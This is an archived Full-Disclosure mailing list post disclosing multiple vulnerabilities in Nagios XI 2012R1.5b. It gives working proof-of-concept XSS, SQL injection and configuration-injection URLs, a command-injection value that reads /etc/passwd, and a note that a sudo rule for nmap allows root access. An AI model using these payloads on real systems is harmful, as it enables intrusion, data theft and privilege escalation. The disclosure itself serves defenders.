lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CALLAfWPk2ChUGoXeTkav27R_J3dYHotk+Vse0qToGJSymrGnBQ@mail.gmail.com>
Date: Sat, 2 Feb 2013 16:00:04 -0800
From: "temp66@...il.com" <temp66@...il.com>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Multiple Vulnerabilities: Nagios XI 2012R1.5b

Reflected XSS:
Alert Cloud Component:
Example URL:
http://nagiosxiserver/nagiosxi/includes/components/alertcloud/index.php?width=800"}};
alert('xss'); var aa={"a" : {"b" : "
The vulnerable code in Alert Cloud's index.php appears to have been
copied and pasted into several other components as well.
Escalation Wizard:
Example URL:
http://nagiosxiserver/nagiosxi/includes/components/escalationwizard/escalationwizard.php?stage=4&config_name=ffffff'
style='height:5000px;width:5000px;position:absolute;left:-1px;top:-1px'
onmouseover='alert("xss")'/>


Stored XSS:
Nagios QL (aka Legacy Nagios Core Configuration Manager):
Example:
Using
');alert('xss
as the config name of a host escalation entry will result in the
javascript being executed when a user tries to delete that host
escalation entry.
I believe that the Legacy Nagios Core Configuration Manager and the
(regular, non legacy) Core Configuration Manager share configuration
settings in a database. I was unable to test whether script injected
via Nagios QL could be executed by using the (regular) Core
Configuration Manager because the (regular) Core Configuration Manager
appears to be broken in this release (?).


Command Execution:
Autodiscovery does not filter input properly. Any user can submit new
jobs, even regular user accounts with read only access. Autodiscovery
may not appear in the menu for some users, it may be necessary to
browse directly to the autodiscovery page.
Example (as the scan target): \; cat /etc/passwd \;
Then look at the job results.
Due to what seems to be (as far as I can tell) a very poorly thought
out sudo rule, a user could upload a custom nmap script to the server
and run it (through sudo) for easy root access.
Yes, there is a sudo rule that allows apache to run nmap as root.
Autodiscovery requires manual activation before it can be used (and
this vulnerability exploited).
Autodiscovery does use a nonce, but this can be bypassed with XSS.


Not sure what to call this, content spoofing maybe?
Whatever you would call it, this could be used for phishing (or whatever).
Nagios XI Admin Panel:
http://172.16.4.51/nagiosxi/admin/?xiwindow=http://w3c.org


SQL Injection:
Sorry about the poor examples below, they should be enough to
demonstrate the point though.
NagiosQL (aka Legacy Nagios Core Configuration Manager):
Example URL:
http://nagiosxiserver/nagiosql/admin/commandline.php?cname=a'+or+'a'='a
Vulnerable Code:
if (isset($_GET['cname']) && ($_GET['cname'] != "")) {
        $strResult = $myDBClass->getFieldData("SELECT command_line
FROM tbl_command WHERE id='".$_GET['cname']."'");
There are other pages in NagiosQL that are also vulnerable.
Escalation Wizard:
Example URL:
http://nagiosxiserver/nagiosxi/includes/components/escalationwizard/escalationwizard.php?stage=5&submitted=true&level='


CSRF:
NagiosQL (aka Legacy Nagios Core Configuration Manager)
Escalation Wizard


Configuration File Injection:
Example URL:
http://nagiosxiserver/nagiosxi/includes/components/escalationwizard/escalationwizard.php?config_name=CoolConfigDD&contacts[]=1&contactgroups[]=1&timeperiod=2&first=1&last=10&interval=1&done=false&stage=5&level=1&objecttype=host&submitted=true&options[]=d%0A}%0Adefine
host%0A%23
The 'options' GET parameter is limited to 20 characters (VARCHAR 20 in
the DB) and is placed in the 'escalation_options' field in the
hostescalations.cfg file.
I'm not sure if it is possible to do anything useful with only 20
characters, but I find it interesting none the less. The above example
creates an empty host definition that doesn't mess up the config file.
If an invalid configuration file is created, the last know good
configuration is rolled back and nagios is restarted, so this cannot
be used for denial of service.


James Clawson

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ